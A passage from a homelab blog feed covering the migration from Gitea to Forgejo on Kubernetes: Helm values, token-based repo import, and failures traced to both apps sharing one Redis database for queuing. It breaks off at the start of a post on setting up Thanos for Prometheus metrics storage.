</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_ENABLE_TIMETRACKING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SHOW_REGISTRATION_BUTTON</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repository</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCRIPT_TYPE</span>: <span style="color:#ae81ff">bash</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_PRIVATE</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_BRANCH</span>: <span style="color:#ae81ff">main</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">queue</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TYPE</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">CONN_STR</span>: <span style="color:#e6db74">&#34;addr=redis.redis.svc.cluster.local:6379,db=1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">WORKERS</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">BOOST_WORKERS</span>: <span style="color:#ae81ff">5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_EMAIL_NOTIFICATIONS</span>: <span style="color:#ae81ff">disabled</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">openid</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLE_OPENID_SIGNIN</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOWED_HOST_LIST</span>: <span style="color:#ae81ff">private</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mailer</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SUBJECT_PREFIX</span>: <span style="color:#e6db74">&#34;[Forgejo]&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_ADDR</span>: <span style="color:#ae81ff">mail.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SMTP_PORT</span>: <span style="color:#e6db74">&#34;465&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">FROM</span>: <span style="color:#e6db74">&#34;forgejo@mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">USER</span>: <span style="color:#e6db74">&#34;apps@mei-home.net&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cache</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ADAPTER</span>: <span style="color:#e6db74">&#34;redis&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">INTERVAL</span>: <span style="color:#ae81ff">60</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">HOST</span>: <span style="color:#e6db74">&#34;network=tcp,addr=redis.redis.svc.cluster.local:6379,db=1,pool_size=100,idle_timeout=180&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ITEM_TTL</span>: <span style="color:#ae81ff">7d</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">session</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER</span>: <span style="color:#ae81ff">redis</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">PROVIDER_CONFIG</span>: <span style="color:#ae81ff">network=tcp,addr=redis.redis.svc.cluster.local:6379,db=1,pool_size=100,idle_timeout=180</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">time</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">DEFAULT_UI_LOCATION</span>: <span style="color:#e6db74">&#34;Europe/Berlin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.archive_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_mirrors</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.repo_health_check</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 30 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">TIMEOUT</span>: <span style="color:#e6db74">&#34;5m&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.check_repo_stats</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;0 0 5 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.update_migration_poster_id</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.sync_external_users</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">UPDATE_EXISTING</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cron.deleted_branches_cleanup</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">RUN_AT_START</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">SCHEDULE</span>: <span style="color:#e6db74">&#34;@every 24h&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">migrations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ALLOW_LOCALNETWORKS</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">packages</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">STORAGE_TYPE</span>: <span style="color:#ae81ff">minio</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_ENDPOINT</span>: <span style="color:#ae81ff">rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_LOCATION</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">MINIO_USE_SSL</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">additionalConfigFromEnvs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__HOST</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">host</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">dbname</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__USER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__DATABASE__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__MAILER__PASSWD</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mail-pw</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__STORAGE__MINIO_BUCKET</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">configMapKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">BUCKET_NAME</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__STORAGE__MINIO_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">FORGEJO__STORAGE__MINIO_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyRef</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">forgejo-bucket</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis-cluster</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql-ha</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>When migrating from Gitea to Forgejo by doing a copy+paste of the <code>values.yaml</code>
for their respective Helm charts, there are a few differences to be taken into
account.</p>
<p>First, all of the environment variables should be prefixed with <code>FORGEJO</code>
instead of <code>GITEA</code>. Another one is the way Actions, the CI system, is disabled.
I&rsquo;m running <a href="https://woodpecker-ci.org/">Woodpecker</a> as my CI, so I didn&rsquo;t need
Actions. In the Gitea Helm chart, Actions is disabled like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>In Forgejo, there is no specific Helm value to do so, instead the Forgejo config
option needs to be set:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">actions</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ENABLED</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>I&rsquo;ve also switched my approach to the admin account config. In Gitea, I already
had an admin account, because I was only migrating from the Nomad setup to k8s.
But for Forgejo, I was creating an entirely fresh instance, so I chose this
config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">gitea</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;forgejo-admin&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;12345&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">passwordMode</span>: <span style="color:#ae81ff">initialOnlyRequireReset</span>
</span></span></code></pre></div><p>It creates the <code>forgejo-admin</code> account and sets the password initially to <code>12345</code>.
The <code>initialOnlyRequireReset</code> setting then requires a reset of the password upon
first login, and then the chart will never touch the password again.</p>
<p>And then perhaps the most important setting. The Redis connection string. I only
have one Redis instance in my Homelab. So it would be shared between Gitea and
Forgejo, which would need to run in parallel while I was migrating the repos.</p>
<pre tabindex="0"><code>network=tcp,addr=redis.redis.svc.cluster.local:6379,db=1,pool_size=100,idle_timeout=180
</code></pre><p>The important piece in this connection string, and all the others in the <code>values.yaml</code>
is the <code>db=1</code> setting at the end. My Gitea chart had that set to <code>db=0</code>. And so
did my Forgejo instance during the entire migration. This had some frustrating/funny
consequences I will describe later.</p>
<p>And that&rsquo;s really already it. All of the other settings are the same as my
Gitea instance and described in detail in the previous post I linked above.</p>
<h2 id="repo-migration">Repo migration</h2>
<p>At this point, I had Gitea and Forgejo running in parallel in the cluster. The
main thing left was to migrate the repositories. Luckily, Forgejo can import
repositories from Gitea. For that, I needed to provide an API token for Gitea
to Forgejo. This token can be generated by any user, under <em>User Settings</em> -&gt;
<em>Applications</em>:</p>
<figure>
    <img loading="lazy" src="token-creation.png"
         alt="A screenshot of Gitea&#39;s API token generation form. It is headed &#39;Generate New Token&#39;. After that follows a field labeled &#39;Token Name&#39;, which is filled out with &#39;Forgejo Demo&#39; in this instance. Then follow two radio buttons, headed &#39;Repository and Organization Access&#39;. The two choices are labeled &#39;Public only&#39; and &#39;All (public, private, and limited)&#39;. The &#39;All&#39; one is chosen in the screenshot. Then follows a foldable section labeled &#39;Select permissions&#39; with a series of drop down list choices. In all of them, &#39;Read and Write&#39; is chosen in the screenshot. Finally, there is a &#39;Generate Token&#39; at the very end of the form."/> <figcaption>
            <p>Gitea&rsquo;s API token generation form.</p>
        </figcaption>
</figure>

<p>Once the token is generated, it will be shown at the top of the screen:
<figure>
    <img loading="lazy" src="token-created.png"
         alt="Another screenshot of the token management UI. Now, there is a notice at the top, with a green background, reading &#39;Your new token has been generated. Copy it now as it will not be shown again.&#39;. Below that is another notice with a blue background containing a random string of numbers and letters."/> <figcaption>
            <p>The token shown after generation.</p>
        </figcaption>
</figure>

The token needs to be copied immediately, as it will not be accessible again.</p>
<p>Then I started the migration. Which was when the frustration began. Forgejo&rsquo;s
Gitea migration screen looks like this:
<figure>
    <img loading="lazy" src="migration-form.png"
         alt="A screenshot of Forgejo&#39;s repo migration form for migrating a repo from Gitea to Forgejo. The first field is labeled &#39;Migrate / Clone from URL&#39; and has the value &#39;https://gitea.mei-home.net/mmeier/migration-test.git&#39;. Next comes a field labeled &#39;Access token&#39;, which is starred out here. Then come a couple of checkboxes for migration options. The first one is &#39;this repository will be a mirror&#39;, which is left unchecked. Then comes &#39;Wiki&#39;, also unchecked. Then follow a couple of additional repository features Gitea provides, all of them are checked in the screenshot: &#39;Issues&#39;, &#39;Pull requests&#39;, &#39;Labels&#39;, &#39;Milestones&#39;, &#39;Releases&#39;. Then comes the next section with the configuration of where exactly the repo should be migrated to. The first field is a drop down labeled &#39;Owner&#39;. The chosen value here is &#39;mmeier&#39;. Next is the &#39;Repository name&#39; field, chosen here as &#39;migration-test&#39;. Then a checkbox marked &#39;Make repository private&#39; is checked. A text box labeled &#39;Description&#39; is left empty. At the very bottom sits a button labeled &#39;Migrate repository&#39;."/> <figcaption>
            <p>An example of the migration form.</p>
        </figcaption>
</figure>
</p>
<p>After hitting &ldquo;Migrate repository&rdquo; on the first repo, I got this screen:
<figure>
    <img loading="lazy" src="migration-screen.png"
         alt="A screenshot of Forgejo&#39;s migration screen. It contains Forgejo&#39;s logo of two Git branches and the text &#39;Migration from https://gitea.mei-home.net/mmeier/migration-test.git&#39;. At the bottom is a button labeled &#39;Cancel&#39;."/> <figcaption>
            <p>Forgejo&rsquo;s migration waiting screen.</p>
        </figcaption>
</figure>
</p>
<p>And then nothing further happened. After a while, I hit the &ldquo;Cancel&rdquo; button.
A new modal with a yes/no button appeared. I hit &ldquo;Yes&rdquo;. Still nothing happened.
I was still on the migration waiting screen. Something had gone wrong. As I could
not cancel, I tried restarting the Forgejo instance. Still the same thing, opening
the repo brought me right back to this screen. I logged out and back in. Still
the same thing. I logged in as admin and checked the repo. Still the same thing.
I finally ended up deleting the repo via the admin interface.</p>
<p>Then I tried again. With exactly the same parameters. And exactly the same results.</p>
<p>Starting to get frustrated, I opened the logs of both Forgejo and Gitea. In the
Forgejo logs, I only saw these lines, repeating ad infinitum:</p>
<pre tabindex="0"><code>2025-05-18 15:35:43.000 router: completed GET /user/task/1 for 10.8.14.218:60046, 200 OK in 48.3ms @ user/task.go:16(user.TaskStatus)
2025-05-18 15:35:42.000 router: completed GET /homelab/homelab for 10.8.14.218:60046, 200 OK in 167.5ms @ repo/view.go:798(repo.Home)
2025-05-18 15:35:42.000 router: completed POST /repo/migrate for 10.8.14.218:60046, 303 See Other in 1266.1ms @ repo/migrate.go:152(repo.MigratePost)
</code></pre><p>In the Gitea logs, I saw a couple of errors though:</p>
<pre tabindex="0"><code>2025-05-18 15:35:43.000 Run task failed: failed to decrypt by secret, the key (maybe SECRET_KEY?) might be incorrect: AesDecrypt invalid decrypted base64 string: illegal base64 data at input byte 0
2025-05-18 15:35:43.000 runMigrateTask[1] by DoerID[2] to RepoID[1] for OwnerID[3] failed: failed to decrypt by secret, the key (maybe SECRET_KEY?) might be incorrect: AesDecrypt invalid decrypted base64 string: illegal base64 data at input byte 0
2025-05-18 15:35:43.000 FinishMigrateTask[1] by DoerID[2] to RepoID[1] for OwnerID[3] failed: failed to decrypt by secret, the key (maybe SECRET_KEY?) might be incorrect: AesDecrypt invalid decrypted base64 string: illegal base64 data at input byte 0
</code></pre><p>I had no idea what was going on here. Why would there be some decryption error?
I was perfectly able to navigate to the repo in the Gitea UI, and I was also
able to clone the repo. I just didn&rsquo;t know what was going on. So I just tried
again. And this time it worked. No indication of any issue.</p>
<p>This pattern repeated for all 78 repos I migrated. Almost every repo required multiple
attempts at migration. Randomly, some would succeed at the first attempt, others
would require a dozen attempts. And I wasn&rsquo;t able to make any sense of it.</p>
<p>So I just powered through. Spend the entirety of my Sunday doing this. It was
very decidedly not fun.</p>
<p>Towards the end, I saw a couple of logs in Gitea like this:</p>
<pre tabindex="0"><code>2025-05-18 23:30:00.000 Run task failed: repository does not exist [id: 194, uid: 0, owner_name: , name: ]
2025-05-18 23:30:00.000 runMigrateTask[194] by DoerID[2] to RepoID[194] for OwnerID[2] failed: repository does not exist [id: 194, uid: 0, owner_name: , name: ]
2025-05-18 23:28:58.000 Run task failed: repository does not exist [id: 192, uid: 0, owner_name: , name: ]
2025-05-18 23:28:58.000 runMigrateTask[192] by DoerID[2] to RepoID[192] for OwnerID[2] failed: repository does not exist [id: 192, uid: 0, owner_name: , name: ]
</code></pre><p>I was getting a bit confused - why was Gitea running migration tasks for repos
which weren&rsquo;t even there? Did Forgejo provide invalid repo IDs in the API
requests?
For some reason, I did not find it weird that Gitea was even running any
migration tasks at all.</p>
<p>But I didn&rsquo;t care very much - I was finally done.</p>
<h2 id="enabling-woodpecker">Enabling Woodpecker</h2>
<p>I next went to migrate my Woodpecker CI over to using Forgejo instead of Gitea.
This was pretty straightforward, I just replaced the Gitea config variables with
the Forgejo ones:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_FORGEJO</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">WOODPECKER_FORGEJO_URL</span>: <span style="color:#e6db74">&#34;https://forgejo.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraSecretNamesForEnvFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">forgejo-secret</span>
</span></span></code></pre></div><p>For full details on how I originally set up Woodpecker with Gitea, have a look
at <a href="https://blog.mei-home.net/posts/k8s-migration-15-ci/">this post</a>. Afterwards, I deleted
my old repo configs and added them anew from Forgejo. I don&rsquo;t think there&rsquo;s any
migration tool to do this, but it was just a half dozen repos, so I didn&rsquo;t mind
too much.</p>
<p>What I did mind was that CI runs did not always get triggered. Sometimes, a push
event just wouldn&rsquo;t trigger the webhook, and Woodpecker would have no idea that
a push just happened.</p>
<h2 id="issues-with-events-going-missing">Issues with events going missing</h2>
<p>At that point I was starting to think that there&rsquo;s something seriously wrong
with my setup. But I still had no idea what it might be. But I was observing
an additional problem: Like Gitea, Forgejo&rsquo;s profile page by default shows a
stream of events, like pushes to repositories or creation of issues for example.
And I was seeing that not all events were showing there. The pushes themselves
worked, I was able to see the new commits in Forgejo&rsquo;s UI, but it seemed the
event was getting lost somewhere. Which fit the fact that Woodpecker&rsquo;s webhooks
also weren&rsquo;t triggered reliably.</p>
<p>Still with no idea what&rsquo;s going on, I left my Gitea instance running while I
wrote up a ticket in Forgejo&rsquo;s bug tracker, see <a href="https://codeberg.org/forgejo/forgejo/issues/7916">here</a>.
I figured that I could reproduce the problem pretty reliably, and the Gitea
instance wasn&rsquo;t using many resources, so perhaps I could help the Forgejo team
with debugging.</p>
<p>I then got a few comments, both wondering about why it looked like Gitea was
running migrations at all. And one of the comments mentioned that it looked like
Gitea and Forgejo were sharing databases. But I was 100% sure that they weren&rsquo;t.</p>
<p>And then it hit me. They weren&rsquo;t sharing Postgres DBs - but they were certainly
sharing a Redis instance, and using it for queuing! So there was my issue. Gitea
was thinking it was asked to run migrations on repos it knew nothing about
because it was seeing, and trying to handle, Forgejo&rsquo;s events. And Forgejo&rsquo;s
migrations weren&rsquo;t finishing because the actual migration task was getting
consumed (and then discarded) by Gitea. And that was also what happened to the
missing activity feed and Woodpecker webhook triggering events.</p>
<p>So the issue was entirely homemade. As is only right and proper for a Homelab.</p>
<p>Forgejo is a perfectly fine piece of software and has not given me any grief
at all since I switched it to a different Redis DB by changing the <code>db=0</code> part
of the Redis connection strings to <code>db=1</code>.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Spend more time looking for the fault in your own setup should be taken as the
main lesson here.</p>
<p>I could have done a lot of other things especially with those few very frustrating
hours last Sunday. But at least I&rsquo;ve now learned another good lesson: Make sure
you put your apps into different Redis DBs when they&rsquo;re sharing an instance.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Setting up Thanos for Metrics Storage</title>
      <link>https://blog.mei-home.net/posts/thanos-setup/</link>
      <pubDate>Sun, 18 May 2025 00:00:42 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/thanos-setup/</guid>
      <description>I can stop whenever I want.</description>
      <content:encoded><![CDATA[<p>At the time of writing, I have 328 GiB of Prometheus data. When it all started,
I had about 250 GiB. I could stop gathering more data whenever I like. &#x1f605;</p>
<p>So I&rsquo;ve got a lot of Prometheus data. Especially since I started the Kubernetes
cluster - or rather, since I started scraping it - I had to regularly increase the
size of the storage volume for Prometheus. This might very well be due to my
5 year retention. But part of it, as it will turn out later, was because some of
the things I was scraping had a 10s scrape interval configured.</p>
<p>So where&rsquo;s all the data coming from?
There are currently 21 hosts with the standard node exporter running. Then there&rsquo;s
the Kubernetes scraping I&rsquo;m doing with <a href="https://github.com/prometheus-community/helm-charts/tree/main/charts/kube-prometheus-stack">kube-prometheus-stack</a>. That gathers a lot of metrics for every single container I&rsquo;ve got running.
I don&rsquo;t know how many those are right now, but at least 196, because that&rsquo;s the
number of Pods which are currently running. Then there&rsquo;s also my Ceph cluster.
And a few more bits and bobs, but I doubt that they contribute very much.</p>
<p>Here&rsquo;s the problem in a single plot:
<figure>
    <img loading="lazy" src="growth-prom-volume.png"
         alt="A screenshot of a Grafana time series plot. It shows the size of my Prometheus volume, starting in March 2024 until today. It starts out slightly below 60 GB and constantly growths from there. Shortly after reaching 100 GB in mid-May 2024, it goes down by about 20 GB, but continues growing linearly after that. For the growth rate, it grew by about 13 GB in July 2024. Around the beginning of 2025 the growth rate seems to accelerate, with &#43;24 GB in April 2025. On May 5th, the size fell off a cliff down to 1.62 GB."/> <figcaption>
            <p>Size of my Prometheus volume.</p>
        </figcaption>
</figure>
</p>
<p>So I was getting a bit tired of regularly having to increase the size of my
Prometheus volume. It highlights the utter ridiculousness of the amount of data
gathering I&rsquo;m doing. &#x1f601;
I needed a solution. I considered considerably reducing my metrics
gathering. The counterpoint: But pretty graphs! So another solution needed to
be found.</p>
<p>Enter <a href="https://thanos.io/">Thanos</a>. Two things drew me to it. First and foremost,
it promised to allow me to dump my metrics data into an S3 bucket. Which is great,
because I would not have to worry about volume size increases anymore. The next
time I run out of storage for the metrics, I would be running out of storage,
period. And thanks to Ceph, I would just need to throw in an additional disk
somewhere should that ever happen. That alone would already be a great advantage
over my current setup. But Thanos also supports downsampling of data. While I do
intentionally keep all data for five years right now, I don&rsquo;t really need that
data in full precision. So this would allow me to reduce my storage usage, without
having to drop data entirely. I will even end up with more retention as before,
just not in full precision.</p>
<h2 id="how-thanos-works">How Thanos works</h2>
<p>Thanos works with multiple components as follows:
<figure>
    <img loading="lazy" src="thanos-overview.svg"
